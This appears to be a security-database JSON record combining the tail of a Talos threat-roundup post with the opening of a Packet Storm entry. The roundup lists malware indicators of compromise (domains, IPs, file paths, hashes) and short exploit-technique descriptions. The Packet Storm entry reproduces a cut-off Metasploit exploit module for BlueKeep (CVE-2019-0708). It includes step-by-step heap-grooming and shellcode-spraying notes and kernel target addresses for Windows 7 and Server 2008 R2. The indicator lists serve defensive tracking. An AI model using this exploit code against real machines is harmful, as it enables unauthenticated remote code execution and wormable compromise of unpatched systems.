\n`%APPDATA%\\csrss.exe` | 1 \n`%APPDATA%\\svchost.exe` | 1 \n`%APPDATA%\\InstallDir` | 1 \n`%APPDATA%\\InstallDir\\help.exe` | 1 \n`%APPDATA%\\rundll32.exe` | 1 \n`%APPDATA%\\Other.res` | 1 \n`%APPDATA%\\cstbddwb` | 1 \n`%APPDATA%\\cstbddwb\\jisgivdt.exe` | 1 \n`%TEMP%\\1539673208.bat` | 1 \n`%TEMP%\\1539674363.bat` | 1 \n`%APPDATA%\\ctrjauaa\\dtcisave.exe` | 1 \n`%TEMP%\\52781.bat` | 1 \n`%APPDATA%\\rrcrauae\\dtcisave.exe` | 1 \n`%APPDATA%\\rbdfguju\\dtcisave.exe` | 1 \n`%APPDATA%\\hsabbafd\\dtcisave.exe` | 1 \n`%APPDATA%\\sdttfesd\\dtcisave.exe` | 1 \n`%TEMP%\\307718.bat` | 1 \n`%APPDATA%\\wjjbbdwr\\dtcisave.exe` | 1 \n`%APPDATA%\\afchtjbd\\dtcisave.exe` | 1 \n`%APPDATA%\\bctfsjtc\\dtcisave.exe` | 1 \n \n#### File Hashes\n\n` 09c2143145ee9c113455c149c6ff6f951a2fd67638becc0c21bdb9c1a93e5bc3 1c6068227c934bd7eafa19513c90f83c6e84291689c529efdff52d3bbaee71ad 204fb306993b6547b953c6792d3f5e1c7c24ed1e70c40d0744f5c23d5ecc6260 2121cfce691f58d55a6865d9b0fbadfb37b1cc1b7f50e13914fc8c36d6df7a52 232c60a2fe47c6441527e0f708a695bad64770c4788d65d849895618b37ac537 2fd8a99f2e9d9940779d65f0271bedefccdea87cf9bfee5d456cdba538cd8701 322a2d80f46734cb2605d9eb0d8e7e3e100e36aced1e93302c5ce3151fffc728 34a56d4e0a80a296cfa11f929536f3d2d2ce576e28d1460259b3a2ae72c92a55 3858b2a58127adff7565ba59d9622cb82c27d7b60bb7338a35d7f9396bbb20b1 3c9dab4a204a151e2658a66e948a71790e876c657f48fd449cc57ecd79b50a77 4a461c876e41c8f10b8c682311650f535d607089e3aa930aecfcf7d0400bfb18 6854eeaf50e91cfd239713b8532ada3670c4007d30db92f7a10dcaf3919ad122 7baa48ce1d5b0783fe77a8236301991ebad8cbbfb2726d72ee7baf830be1bfac 9adc55c4337148fa4e463ef6bf008f2423dcf9a17eb0d5dcd245aa932dadd9f5 a6140aa4b277141779e6344174f88e6901e8c2921d49624f4d8a2419afa5cf93 aa6dea172c9db744c31a322163e6ec829517400a8f2af996dda345e9ab5097b8 b97f5e3d1a881e93633bcf38414d63916ba1dde8c5368d34a16aecdd227f16f1 c8a0dae1be189ebb115341551175322f8544c1a169573b43ac015b36ef2bf711 caab2cd143d3ad7e0890b3fe5a561b5a264c089186bf41ee213b1e4a32eedee4 d3cda596ba6945b34c331271ad243e81858a5614713143b04c18d1dea325e0f5 fc10ad68ba5fa127c089389f1acacb6635ae64df1525ec87dad928d7c6ac60b7 fee972c5f99500d1ac8e83ad65484494772885e18721c02f95e256c30f3f8bd2 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-jObWf75rAgQ/XjSEx05OTYI/AAAAAAAADOA/5TU6275HNLQ70PVigbku0GOX4WFyEj8EQCLcBGAsYHQ/s1600/4a461c876e41c8f10b8c682311650f535d607089e3aa930aecfcf7d0400bfb18_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-KAiZHwvmt9s/XjSE1G8rcuI/AAAAAAAADOE/kPJh8vi53TQFO6hEVJJrgNWpobvwadaxwCLcBGAsYHQ/s1600/4a461c876e41c8f10b8c682311650f535d607089e3aa930aecfcf7d0400bfb18_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-aLHBzyZyDwQ/XjSE5PT3F7I/AAAAAAAADOI/5uoJ7Gtx9sQ7ZhTD9iE6YeZsjAD4N87vQCLcBGAsYHQ/s1600/3c9dab4a204a151e2658a66e948a71790e876c657f48fd449cc57ecd79b50a77_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Nymaim-7565328-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KPQL ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KPQL \nValue Name: efp ` | 12 \nMutexes | Occurrences \n---|--- \n`Local\\{06258131-BA39-27D4-02A0-AD682205B627}` | 12 \n`Local\\{2D6DB911-C222-9814-3135-344B99BBA4BA}` | 12 \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 12 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 12 \n`Local\\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}` | 12 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 12 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 12 \n`Local\\{338F4080-2AF8-328F-1D44-E65FAFBB3088}` | 12 \n`Local\\{83B9D177-24D4-29BF-C0FB-035E7B3F2D46}` | 12 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`gvjmoleiqx[.]com` | 11 \n`hjlxybnt[.]pw` | 11 \n`mxsffkacgxhb[.]in` | 11 \n`aqnwun[.]net` | 11 \n`sppja[.]net` | 11 \n`wkbbomuxzbhk[.]com` | 11 \n`ipfmg[.]pw` | 11 \n`tznyr[.]com` | 11 \n`tajlmh[.]com` | 11 \n`flphjxmni[.]com` | 11 \n`ezkdeavdhzte[.]com` | 11 \n`lmlnzwlwgn[.]com` | 11 \n`ebiodd[.]pw` | 11 \n`krbmzpx[.]com` | 11 \n`llqikewmnt[.]net` | 11 \n`lgniduzwgg[.]pw` | 11 \n`rdbaqoj[.]pw` | 11 \n`ljcpqydcptw[.]pw` | 11 \n`jaokwlaiwjx[.]in` | 11 \n`spiesfhvlq[.]in` | 11 \n`pewxbb[.]pw` | 11 \n`yabnl[.]in` | 11 \n`gejetvtxpjze[.]in` | 11 \n`qrqtmeuk[.]net` | 11 \n`wicxqfc[.]in` | 11 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\fro.dfx` | 12 \n`%TEMP%\\npsosm.pan` | 12 \n`\\Documents and Settings\\All Users\\pxs\\dvf.evp` | 12 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 12 \n`%ProgramData%\\ph` | 12 \n`%ProgramData%\\ph\\eqdw.dbc` | 12 \n`%ProgramData%\\ph\\fktiipx.ftf` | 12 \n`%TEMP%\\gocf.ksv` | 12 \n`%TEMP%\\kpqlnn.iuy` | 12 \n \n#### File Hashes\n\n` 0a32a31d2b9d356c8887506ac547d5f44cc34ab40d8549d3f79709a9fa84381c 14d5e17e32f558058739e0633b2e61851186500c0aa80967dac57968e018fe37 16b1ca029162ab6c4a241d60d2de8a015a8cd866f050b9847d228ab3ba0704ba 4019c94cf57c53ae814fe62f7aa804829a909d19c23922b60921f1418deb51e8 46eef4a7440acb228050b0ec2c4ba6c3e47d5e3f75a6f6bb184a946bd502ce66 4b3dead1bc0865f079731c4f7ce6e19487724e80b39ded94371c09edc6978a48 6c89b38394fbfdcc1766d401d0bf54281e7c4d47388e1a0c99c962655bc6fdb6 7878d706f9f3a683904db685ebe2b6ead7464ec142ef239f242e19ebe1a6fe67 8875970e47c112f058e29d254371350ce058376a791fd9fdabad2ab2ed8dc83c b79952df8a801d9a8619d1254a24bde3ce37ea8ebfd17ca8eb48bdd90b27b305 d1c1dcbee46d723b931f1a18ec83f5f22c515edfcdf4dcd9e04a9ab8f173b4d2 d9273903d761b64374ab16e83b854d412ac27983b95a908f52254992b6092903 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-55F7MMYEjbw/XjSFI_J_-UI/AAAAAAAADOY/bMfRIAduw9o9fyJefhLICn7mV9jVZ3CsgCLcBGAsYHQ/s1600/d1c1dcbee46d723b931f1a18ec83f5f22c515edfcdf4dcd9e04a9ab8f173b4d2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-jQQJou9JHDg/XjSFOkuR7bI/AAAAAAAADOc/hCDIPBhEjgMJ4KGRUiAxMB_CG7kYfPjPACLcBGAsYHQ/s1600/d1c1dcbee46d723b931f1a18ec83f5f22c515edfcdf4dcd9e04a9ab8f173b4d2_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-jN2yfrOW9To/XjSFUu8wOzI/AAAAAAAADOg/Wbfgy4U0mU48sgVrb2lq7D5JNt6xtw0IACLcBGAsYHQ/s1600/8875970e47c112f058e29d254371350ce058376a791fd9fdabad2ab2ed8dc83c_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.ZBot-7563206-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: LoadAppInit_DLLs ` | 19 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: AppInit_DLLs ` | 19 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\aybbmte` | 19 \n`%ProgramData%\\Mozilla\\thfirxd.exe` | 19 \n`%ProgramData%\\Mozilla\\lygbwac.dll` | 19 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\kvlcuie.dll` | 16 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\tfbkpde.exe` | 16 \n`%SystemRoot%\\Tasks\\kylaxsk.job` | 16 \n \n#### File Hashes\n\n` 32d3d77c246077febd6a51c1c4af6cd0ef6e991f9d058814670b4d9b1ffb5929 35dba41629d3ef8e563339fe6169c2ddd9c630667a60e90e50d4901ce0fb3114 47364b16ec0b8af99154c5afb4c55f758c5ffbdc19759c039195d0f630a9fddd 5a3bdec2815d798fed747fd136c383305614c2d708805f5b5100dccce12188d9 64d56df10e94e1fff9ba9592660193168dcaece38ec92682326f7e3a6302c2ca 6ddf8b1b3866f32e26e61bf68e33e74444b591dc64642afe1b842d86cfdf5b33 7319a595fc991cae27e5057bb14714efa68ad74456f8c7c6eedd23575f3c5a47 7dfbb5e40028da7c503344cd4630727b71448ce1bcb2b2164e3217652578e623 8b3a463fc845258b9a4f60f60e853243b748de58ad4758e167decbc22ffe80cb 8c5f9e03729e46d8feb08d5357f21e888f1c922fd13edd626b9e5fea5ade7876 908e06fa764660785cc8f7c02090cbc783b8c2824a2524caefdf26279bae831c b2e187349a3e50eb0e1252a242f65d675cae2e32d362c6025c8cc966922dbf63 cbf3982f100358e34b4c2dc2782886a76432f1dad59761f747c1e8bc10ccec8c d5125b8c5dffe7fa67289ca75fed8d237ba399c779032bef27326d59fc458754 d84cd0947dd7a4c73239b992173267907bdf55fc28976797d2af7ed300bfaf83 d9134462d8be534f26973c5e19767c3c745262573f294cef1ab3b917eb410f98 d9c47353ee4c964a9f2bc115c1d47d02b0219839dbeccc6a72ac5d2df0a6905a e032675300402235fcd213f5b6790097b430051353034d23cacf207a0f642647 f21985a67551565d464004a7661d21a29d1581157955349e9a04dea717ab23d5 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-wJS2RzuoO5w/XjSFhT8K3YI/AAAAAAAADOs/bMXs5otiJvY7XaB3nqAKDGcgedf8QHRYACLcBGAsYHQ/s1600/b2e187349a3e50eb0e1252a242f65d675cae2e32d362c6025c8cc966922dbf63_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Z8WsKJoT9X0/XjSFlNTxwMI/AAAAAAAADO0/dycRgnHvs8gUYsBf1azs8gldBOugusg5QCLcBGAsYHQ/s1600/b2e187349a3e50eb0e1252a242f65d675cae2e32d362c6025c8cc966922dbf63_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### PUA.Win.File.Dealply-7563212-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`54[.]146[.]91[.]247` | 14 \n`52[.]41[.]141[.]111` | 12 \n`34[.]231[.]131[.]84` | 11 \n`54[.]149[.]89[.]229` | 8 \n`198[.]50[.]173[.]223` | 8 \n`54[.]69[.]88[.]117` | 7 \n`35[.]164[.]24[.]169` | 7 \n`52[.]37[.]160[.]176` | 5 \n`54[.]213[.]123[.]75` | 2 \n`207[.]154[.]205[.]3` | 2 \n`172[.]217[.]12[.]174` | 1 \n`172[.]217[.]12[.]142` | 1 \n`151[.]80[.]42[.]103` | 1 \n`23[.]221[.]50[.]122` | 1 \n`5[.]9[.]9[.]18` | 1 \n`172[.]217[.]13[.]238` | 1 \n`23[.]54[.]219[.]51` | 1 \n`185[.]107[.]71[.]41` | 1 \n`51[.]38[.]57[.]168` | 1 \n`159[.]89[.]184[.]138` | 1 \n`23[.]3[.]126[.]219` | 1 \n`165[.]227[.]137[.]252` | 1 \n`23[.]0[.]52[.]194` | 1 \n`178[.]79[.]169[.]193` | 1 \n`149[.]56[.]157[.]112` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`info[.]yidadaridap[.]com` | 25 \n`rp[.]yidadaridap[.]com` | 25 \n`sourceforge[.]net` | 9 \n`media[.]phpnuke[.]org` | 8 \n`os2[.]yidadaridap[.]com` | 8 \n`os[.]yidadaridap[.]com` | 8 \n`mydati[.]com` | 3 \n`schema[.]org` | 2 \n`www[.]gstatic[.]com` | 1 \n`market[.]android[.]com` | 1 \n`i[.]ytimg[.]com` | 1 \n`lh3[.]googleusercontent[.]com` | 1 \n`img-prod-cms-rt-microsoft-com[.]akamaized[.]net` | 1 \n`developer[.]android[.]com` | 1 \n`channel9[.]msdn[.]com` | 1 \n`store[.]office[.]com` | 1 \n`products[.]office[.]com` | 1 \n`assets[.]onestore[.]ms` | 1 \n`statics-marketingsites-wcus-ms-com[.]akamaized[.]net` | 1 \n`pf[.]benjaminstrahs[.]com` | 1 \n`www[.]deadpoolgame[.]com` | 1 \n`trials[.]dynamics[.]com` | 1 \n`www[.]azure[.]com` | 1 \n`www[.]befunky[.]com` | 1 \n`www[.]rockstargames[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\in10F4BD16` | 25 \n`%TEMP%\\in10F4BD16\\472F35C2.tmp` | 25 \n`%TEMP%\\<random, matching '[A-F0-9]{8}'>.log` | 25 \n`%TEMP%\\INH162~1\\css\\ie6_main.css` | 24 \n`%TEMP%\\INH162~1\\css\\main.css` | 24 \n`%TEMP%\\INH162~1\\css\\sdk-ui\\browse.css` | 24 \n`%TEMP%\\INH162~1\\css\\sdk-ui\\button.css` | 24 \n`%TEMP%\\INH162~1\\css\\sdk-ui\\checkbox.css` | 24 \n`%TEMP%\\INH162~1\\css\\sdk-ui\\images\\button-bg.png` | 24 \n`%TEMP%\\INH162~1\\css\\sdk-ui\\images\\progress-bg-corner.png` | 24 \n`%TEMP%\\INH162~1\\css\\sdk-ui\\images\\progress-bg.png` | 24 \n`%TEMP%\\INH162~1\\css\\sdk-ui\\images\\progress-bg2.png` | 24 \n`%TEMP%\\INH162~1\\css\\sdk-ui\\progress-bar.css` | 24 \n`%TEMP%\\INH162~1\\csshover3.htc` | 24 \n`%TEMP%\\INH162~1\\images\\BG.png` | 24 \n`%TEMP%\\INH162~1\\images\\Button.png` | 24 \n`%TEMP%\\INH162~1\\images\\Button_Hover.png` | 24 \n`%TEMP%\\INH162~1\\images\\Close.png` | 24 \n`%TEMP%\\INH162~1\\images\\Close_Hover.png` | 24 \n`%TEMP%\\INH162~1\\images\\Icon_Generic.png` | 24 \n`%TEMP%\\INH162~1\\images\\Loader.gif` | 24 \n`%TEMP%\\INH162~1\\images\\Pause_Button.png` | 24 \n`%TEMP%\\INH162~1\\images\\Progress.png` | 24 \n`%TEMP%\\INH162~1\\images\\ProgressBar.png` | 24 \n`%TEMP%\\INH162~1\\images\\Quick_Specs.png` | 24 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 029c5f2c2dbec036f397cd9f0352c99b5518adb48e9e0c14479b1042de97a8e1 043768f5d9923ecd231657dd90b8c5557987c0a96dbb0e90366c64d62893911d 049576cad41dcdad343c0e1b724cdc9ff854ad7f519d02dff60f5e5e611d4e4b 10e6962923b5afccb804f0089fdcfc47d33f8006bdc6b806b6d954e8a9df2ac2 192426fc265d7bd4d385b3c5a983725a754927d65ebc62c3097b2f41f447e4fa 1c99f891424cb56a090d2e1eb5625db0786f04c6704c82532198024a63a7c50a 2a1a4e11fa18befb29b00399de5af5c17d1d62c361cf1ca0ea069041a79abc39 2fc2a60b7154f47293e51d82e49f8c467b0e61dfa308b1bc53496a885fe730a6 49c4f31b2aae590042eaf9822d3256471ba862a5d2de4b6e8c1c9ba7994f42cd 4e62b6d6df8e3c2b00e4c8769e50cd8a8649b050b99c21e86bff2a344b43ee0b 528941efc56008a7f2c96ebf3f48a27733d95cc3802e1047be791bf0b1524795 57ff8a4bb6c0ff378c413d8e671ac4df2a896124a2b8bfdd56778ec44ba9641e 5be89eb16dab481ea1fb47f9800113bda32e7242230937f9500ce5df602ae1dc 5e4c796fa1e9e895c559d56bf51378a5af8a1341c8a253b289cc97530b757dd7 62a0f3ce3d7b54ca3bd95ec76ab45c226dfbce40ac0743d2dc0d5c73288e6d13 69d1e5b5468e4d083b98f6ed1fc85b98154144286e659390f63a8ad4fee575e6 6acacd65413137480a9e3ee60aa2cb8be000e0e5fc5ff4af2e206d8fcaddb3cf 6cb2a0a139bd72d43509b892d108c93ecf4e1f24e8267ce3862fe48ca35f4447 72948fecb2e7925785c76419a7d94686b1fa4dc3b165607f4cdf28655d69c612 72d3672de410e718288fdb19a2ea817f303f7b68a3358e2b63c4c6c06e4ee6f6 88ccf70fd42ad193bb82044191e4a3cb7eda3b7af3a9a1034104fe5b99e43888 914573db0bfe9ccdf1a102828397523f3abac13a8859b13d743f15fa7de00096 948cb02c5eb1afade4086c04f3954748cd37707a1f44ba6854bd38258844cbec a0c5d45bb1b35ff2f76e4b96112de328d2bf0032a5fefa843a6be6c14cf96d0f ac927c4c24469eb1de203e32a56bce3a0fa4eca37b4388fd35e6be699f8dc7e7 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-hHtzSMciKKg/XjSF1b1xqZI/AAAAAAAADPA/erzglCJ_LE8iKieua3bRC4-gZtrOja98gCLcBGAsYHQ/s1600/10e6962923b5afccb804f0089fdcfc47d33f8006bdc6b806b6d954e8a9df2ac2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IcwP4FQEYGA/XjSF40IhQsI/AAAAAAAADPE/tKpgXAIY_HIVn0wpKOMg4vehP9spNi57QCLcBGAsYHQ/s1600/10e6962923b5afccb804f0089fdcfc47d33f8006bdc6b806b6d954e8a9df2ac2_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (5959) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (313) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (220) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (188) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (111) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nExcessively long PowerShell command detected \\- (84) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nReverse http payload detected \\- (32) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nAtom Bombing code injection technique detected \\- (32) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nDealply adware detected \\- (22) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nCorebot malware detected \\- (16) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&amp;C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "modified": "2020-01-31T12:51:42", "published": "2020-01-31T12:51:42", "id": "TALOSBLOG:4C073D825207102B86D0C8999A5A28CC", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3rXNzEU5vIw/threat-roundup-0124-0131.html", "type": "talosblog", "title": "Threat Roundup for January 24 to January 31", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-09-24T06:46:41", "description": "", "published": "2019-09-23T00:00:00", "type": "packetstorm", "title": "BlueKeep RDP Remote Windows Kernel Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2019-09-23T00:00:00", "id": "PACKETSTORM:154579", "href": "https://packetstormsecurity.com/files/154579/BlueKeep-RDP-Remote-Windows-Kernel-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# Exploitation and Caveats from zerosum0x0: \n# \n# 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally. \n# 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py) \n# 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120. \n# 4. RDP has chunked messages, so we use this to groom. \n# a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120. \n# b. However, on 7+, MS_T120 will not work and you have to use RDPSND. \n# i. RDPSND only works when \n# HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam = 0 \n# ii. This registry key is not a default setting for server 2008 R2. \n# We should use alternate groom channels or at least detect the \n# channel in advance. \n# 5. Use chunked grooming to fit new data in the freed channel, account for \n# the allocation header size (like 0x38 I think?). At offset 0x100? is where \n# the \"call [rax]\" gadget will get its pointer from. \n# a. The NonPagedPool (NPP) starts at a fixed address on XP-7 \n# i. Hot-swap memory is another problem because, with certain VMWare and \n# Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP \n# start. This can be anywhere from 100 mb to gigabytes of offset \n# before the NPP start. \n# b. Set offset 0x100 to NPPStart+SizeOfGroomInMB \n# c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need \n# [NPPStart+SizeOfGroomInMB+8...payload]... because \"call [rax]\" is an \n# indirect call \n# d. We are limited to 0x400 payloads by channel chunk max size. My \n# current shellcode is a twin shellcode with eggfinders. I spam the \n# kernel payload and user payload, and if user payload is called first it \n# will egghunt for the kernel payload. \n# 6. After channel hole is filled and the NPP is spammed up with shellcode, \n# trigger the free by closing the socket. \n# \n# TODO: \n# * Detect OS specifics / obtain memory leak to determine NPP start address. \n# * Write the XP/2003 portions grooming MS_T120. \n# * Detect if RDPSND grooming is working or not? \n# * Expand channels besides RDPSND/MS_T120 for grooming. \n# See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/ \n# \n# https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming \n# MS_T120 on XP... should be same process as the RDPSND \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ManualRanking \n \nUSERMODE_EGG = 0xb00dac0fefe31337 \nKERNELMODE_EGG = 0xb00dac0fefe42069 \n \nCHUNK_SIZE = 0x400 \nHEADER_SIZE = 0x48 \n \ninclude Msf::Exploit::Remote::RDP \ninclude Msf::Exploit::Remote::CheckScanner \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free', \n'Description' => %q( \nThe RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, \nallowing a malformed Disconnect Provider Indication message to cause use-after-free. \nWith a controllable data/size remote nonpaged pool spray, an indirect call gadget of \nthe freed channel is used to achieve arbitrary code execution. \n), \n'Author' => \n[ \n'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 - Original exploit \n'Ryan Hanson', # @ryHanson - Original exploit \n'OJ Reeves <oj@beyondbinary.io>', # @TheColonial - Metasploit module \n'Brent Cook <bcook@rapid7.com>', # @busterbcook - Assembly whisperer \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2019-0708'], \n['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n'WfsDelay' => 5, \n'RDP_CLIENT_NAME' => 'ethdev', \n'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep' \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => CHUNK_SIZE - HEADER_SIZE, \n'EncoderType' => Msf::Encoder::Type::Raw, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ \n'Automatic targeting via fingerprinting', \n{ \n'Arch' => [ARCH_X64], \n'FingerprintOnly' => true \n}, \n], \n# \n# \n# Windows 2008 R2 requires the following registry change from default: \n# \n# [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\rdpwd] \n# \"fDisableCam\"=dword:00000000 \n# \n[ \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8003800000, \n'GROOMSIZE' => 100 \n} \n], \n[ \n# This works with Virtualbox 6 \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8002407000 \n} \n], \n[ \n# This address works on VMWare 14 \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8030c00000 \n} \n], \n[ \n# This address works on VMWare 15 \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8018C00000 \n} \n], \n[ \n# This address works on VMWare 15.1 \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8018c08000 \n} \n], \n[ \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], 